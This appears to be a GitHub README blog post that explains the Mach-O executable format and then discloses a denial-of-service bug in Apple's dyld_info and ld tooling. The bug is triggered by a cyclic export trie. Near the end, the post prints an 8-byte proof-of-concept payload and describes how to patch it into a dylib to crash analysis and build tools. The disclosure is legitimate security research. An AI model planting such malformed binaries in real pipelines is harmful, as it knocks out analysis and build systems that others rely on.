Skip to content

yo-yo-yo-jbo/macho_structure

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

The Mach-o file format

In this blogpost, I will be discussing a hole I have in my blog - the Mach-O file format.
I will also be revealing a silly DoS bug I found in one of Apple's utilities that parses Mach-O files.

Introduction

In macOS, every executable, dynamic library, kernel extension, and bundle shares a common skeleton: the Mach-O file format.
If you've ever opened a binary with otool, debugged with lldb, or wondered what dyld is actually loading at process start, you've been brushing up against Mach-O.
Mach-O ("Mach Object") is inherited from the Mach kernel work at CMU and adopted by NeXTSTEP, which Apple acquired in 1996.
It replaced a.out and now serves macOS, iOS, watchOS, tvOS, and visionOS.
Just like Linux uses ELF and Windows uses PE files - Mach-O is Apple's equivalent, and it's designed around a few things ELF and PE handle differently:

  • Multi-architecture binaries via the "fat" / universal wrapper
  • Two-level namespaces so symbols carry which library they came from
  • Code signing baked in as a first-class load command
  • Dyld-driven dynamic linking - rather than relying on PLT/GOT conventions alone

The Three Layers

A Mach-O file has some conceptual layers, from outside in:

  1. An optional Fat header - wraps multiple architecture slices into one file
  2. Mach header - identifies the architecture and file type
  3. Load commands - a directive list telling the loader what to do
  4. Segments and sections - the actual code and data

The Fat Header (Universal Binaries)

When Apple ships a binary that runs on both Apple Silicon and Intel, they wrap two Mach-O files in a single container.
The magic number 0xCAFEBABE (or 0xCAFEBABE byte-swapped, depending on Endianness) at offset 0 signals this.

struct fat_header {
    uint32_t magic;             // FAT_MAGIC / FAT_MAGIC_64
    uint32_t nfat_arch;         // Number of slices
};

Followed by nfat_arch of:

struct fat_arch {
    cpu_type_t    cputype;          // e.g. CPU_TYPE_ARM64
    cpu_subtype_t cpusubtype;
    uint32_t      offset;           // Where this slice lives in the file
    uint32_t      size;
    uint32_t      align;
};

The lipo utility is quite useful for parsing and handling Fat binaries:

  • lipo -info /bin/ls will tell you which slices are present
  • lipo -thin arm64 ... extracts slices.

Here's an example:

jbo@JBOs-MacBook-Pro ~ % lipo -info /bin/ls
Architectures in the fat file: /bin/ls are: x86_64 arm64e

As a side note, 0xCAFEBABE is also Java's class file magic, which is why file sometimes needs context to disambiguate.

The Mach Header

Each architecture slice begins with the Mach header. On 64-bit (the vast majority of files in this day and age):

struct mach_header_64 {
    uint32_t magic;             // MH_MAGIC_64 = 0xFEEDFACF
    cpu_type_t cputype;
    cpu_subtype_t cpusubtype;
    uint32_t filetype;          // MH_EXECUTE, MH_DYLIB, MH_BUNDLE, ...
    uint32_t ncmds;             // Number of load commands
    uint32_t sizeofcmds;        // Total bytes of load commands
    uint32_t flags;             // MH_PIE, MH_TWOLEVEL, ...
    uint32_t reserved;
};

The filetype field is the first thing to look at. Here are the common ones:

filetype Meaning
MH_EXECUTE A runnable program
MH_DYLIB A dynamic library (.dylib)
MH_BUNDLE A plugin (.bundle)
MH_DYLINKER dyld itself
MH_KEXT_BUNDLE A kernel extension
MH_OBJECT A relocatable .o

Load Commands

Immediately after the header is a list of variable-sized load commands. Each one is an instruction to dyld or the kernel.
Every load command starts with:

struct load_command {
    uint32_t cmd;           // Command type
    uint32_t cmdsize;       // Total size (including the header)
};

There are dozens of load command types. Here are a couple of important ones:

  • LC_SEGMENT_64 - Describes a segment of the file to map into memory.
  • LC_LOAD_DYLIB - Dependencies (e.g. /usr/lib/libSystem.B.dylib means that this Mach-O depends on libSystem.B.dylib and therefore it should be loaded).
  • LC_MAIN - Entry point for executables (replaced LC_UNIXTHREAD around macOS 10.8).
  • LC_DYLD_INFO_ONLY / LC_DYLD_CHAINED_FIXUPS - Rebase and binding information.
  • LC_SYMTAB / LC_DYSYMTAB - Symbol tables.
  • LC_CODE_SIGNATURE - Embedded code signing blob.
  • LC_BUILD_VERSION - Minimum OS version and SDK info.
  • LC_RPATH - Runtime search path for dylibs (the @rpath token resolves against these).
  • LC_UUID - A unique build identifier, used by dsymutil to pair binaries with their .dSYM debug bundles.
  • LC_FUNCTION_STARTS - Compact-encoded list of function start addresses for the unwinder and debuggers.

We can run otool -l <binary> to dump the full list of the load commands from a given binary.

Segments and Sections

The LC_SEGMENT_64 Load command defines a segment.
Segments are contiguous ranges of the file that gets mapped into memory with specific permissions.
Each segment is then divided into sections. The standard layout for an executable:

__PAGEZERO

The first segment, but it has no file content - it's a 4GB (on 64-bit) unmapped region at virtual address 0.
Its only job is to make null-pointer dereferences crash hard - it's not readable, writable or executable.
From my experiments, modifying this to be smaller than 4GB would make AMFI kill the process upon loading, at least on AArch64.

__TEXT

It's read-only and executable. Contains the following sections:

  • __text - Actual machine instructions.
  • __stubs / __stub_helper - Jump stubs for lazily-bound external functions.
  • __cstring - NUL-terminated string literals.
  • __const - read-only constants.
  • __unwind_info - Compact unwind tables for exception handling.

Being read-only and executable means __TEXT can be shared between processes - every running copy of /bin/ls shares the same physical pages for its code.

__DATA and __DATA_CONST

Mapped as readable and writable. Apple split this into two segments to harden the runtime:

  • __DATA_CONST is mapped read-write briefly during linking, then flipped to read-only. It holds things like the GOT and function pointers that shouldn't change after process start.
  • __DATA is read-write throughout the program's life: globals, BSS and so on.

Typical sections include __got, __la_symbol_ptr (lazy symbol pointers), __data, __bss, and __common.

__LINKEDIT

The catch-all segment at the end of the file.
Holds data that dyld needs but the running program doesn't address directly: the symbol table, string table, chained fixups, code signature, function starts table, and so on. It is mapped as read-only.

Practical example

Run this on any macOS executable:

otool -hV /bin/ls       # Mach header
otool -lV /bin/ls       # Load commands (verbose)
otool -L /bin/ls        # Just the LC_LOAD_DYLIB entries
nm /bin/ls              # Symbol table
codesign -dv /bin/ls    # Code signature info

For a deeper view, the dyld_info utility (added in macOS 12) gives a much nicer breakdown of chained fixups, exports, and bindings than the older otool -I output.

How dyld works

When you exec() a Mach-O executable, the kernel does the following:

  1. Maps the __TEXT, __DATA, __DATA_CONST, and __LINKEDIT segments according to the LC_SEGMENT_64 commands.
  2. Loads the dynamic linker named in LC_LOAD_DYLINKER (almost always points to /usr/lib/dyld).
  3. Hands control to dyld.

At that point dyld takes over and does the following:

  1. Walks the LC_LOAD_DYLIB list and recursively loads dependencies.
  2. Applies rebases (adjusting pointers for ASLR slide) and binds external symbols using the chained fixups or older bind opcodes.
  3. Runs initializers (+load methods, __attribute__((constructor)) functions, etc.).
  4. Jumps to the entry point given by LC_MAIN.

DoS due to a cyclic export Trie

While Mach-O's structure is less complex (at least in my opinion) when compared to PE or ELF files, parsing binary files (in general) is difficult. Here's a bug I recently reported to Apple Product Security against macOS 26.4 that's a nice illustration of why the format-level details matter.

What's an export Trie

Earlier I mentioned LC_DYLD_INFO_ONLY and LC_DYLD_CHAINED_FIXUPS.
There's a related load command, LC_DYLD_EXPORTS_TRIE, that points (via dataoff / datasize) at a blob inside __LINKEDIT containing the dylib's exported symbols, encoded as a Trie (prefix tree) rather than a flat list.
Each node in the Trie is a few bytes:

  • A ULEB128 terminal size (0 if this node isn't itself a complete symbol, otherwise the size of the export info payload that follows).
  • The export info payload (flags, address, etc.) if the terminal size is non-zero.
  • A child count (in a single byte).
  • For each child: a NULL-terminated edge label (string fragment) and a ULEB128 child node offset relative to the Trie start.

To resolve a symbol like _hello, you walk from the root, matching label fragments against the symbol name and following the corresponding child offset, until you land on a terminal node.
The format is compact and well-suited to symbol lookup. It is also entirely controlled by whoever produced the binary.

The bug

Inside dyld/mach_o/ExportsTrie.cpp, the function mach_o::GenericTrie::recurseTrie() walks the trie recursively, descending into each child via _trieStart + childNodeOffset.
The only validation on childNodeOffset is that it is non-zero.
More importantly, there is no depth bound, and no tracking of visited nodes.
So, if the Trie contains a cycle - node B's child offset points back to node B (or any ancestor) - recurseTrie() recurses forever until it walks off the bottom of the stack and the kernel stack-guard page kills the process with EXC_BAD_ACCESS / KERN_PROTECTION_FAILURE.
There is a funny asymmetry, by the way - the iterative sibling function GenericTrie::hasEntry(), used at runtime symbol lookup, does maintain a visitedNodeOffsets array (cap 256) and rejects cycles cleanly. The recursive walker, used during validation, doesn't. So, there are really two implementations of the same traversal - only one is hardened.

An 8-byte proof of concept

The malicious Trie payload is tiny: two nodes, eight bytes, with node B's only child being itself:

# node A @ offset 0  ->  child @ offset 4
0x00,  # terminalSize = 0 (not a complete symbol)
0x01,  # childCount = 1
0x00,  # edge label "" (just the NUL terminator)
0x04,  # childNodeOffset = 4  -> node B

# node B @ offset 4  ->  child @ offset 4 (self-loop)
0x00, 0x01, 0x00, 0x04,

Drop that blob into the LC_DYLD_EXPORTS_TRIE region of any ~16 KB dylib (the script in the report uses otool -l to locate dataoff / datasize, then patches the bytes in place), and:

dyld_info -exports tiny_cycle.dylib         # exit 139, SIGSEGV
clang -o loader loader.c tiny_cycle.dylib   # ld: Bus error: 10

Crash report shows roughly 65,000 stack frames of mach_o::GenericTrie::recurseTrie before ___chkstk_darwin catches the overflow.
I put my POC under cycle_poc.sh:

jbo@JBOs-MacBook-Pro macho % ./cycle_poc.sh
./tiny_cycle.dylib [arm64]:
./cycle_poc.sh: line 16: 97961 Segmentation fault: 11  dyld_info ./tiny_cycle.dylib

Under ~/Library/Logs/DiagnosticReports/ you will find later a dyld-info-<timestamp>.ips file, which will have the right information in it:

{
    ...
    "id": 13829582,
    "recursionInfoArray": [
      {
        "hottestElided": 4,
        "coldestElided": 65272,
        "depth": 65275,
        "keyFrame": {
          "imageOffset": 97916,
          "symbol": "mach_o::GenericTrie::recurseTrie(unsigned char const*, dyld3::OverflowSafeArray<char, 4294967295ull>&, int, bool&, void (char const*, std::__1::span<unsigned char const, 18446744073709551615ul>, bool&) block_pointer) const",
          "symbolLocation": 520,
          "imageIndex": 0
        }
      }
    ],
}

Impact

The runtime loader doesn't crash on dlopen() of the same file, because runtime symbol lookup goes through the iterative hasEntry().
So this isn't a runtime exploitation primitive - it's simply a denial-of-service against tooling that validates the Trie:

  • /usr/bin/dyld_info, called by automated analysis pipelines.
  • The Apple system linker ld, invoked transitively by clang <...> some.dylib. Build pipelines that link against attacker-supplied prebuilt frameworks crash with no actionable diagnostic.
  • Any tool using mach_o::ExportsTrie::forEachExportedSymbol() from libdyld_introspection - malware analysis services, app review pre-scanners, EDR products that triage uploaded binaries.

Because the failure mode is a stack-guard fault rather than a memory write, there is no code-execution path.
It is a clean DoS against developer and analysis tooling. As a side note, the issue I found was tracked under OE1105704294054, and was not deemed important enough for a security fix, so I feel comfortable releasing that information.

Summary

In this blogpost, I finally got to talk about the Mach-O structure and even highlight an issue in Apple's own code.
I intend to discuss more about how Objective-C code is compiled and how it affects the file structure further.

Stay tuned!

Jonathan Bar Or

About

Mach-O file structure

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors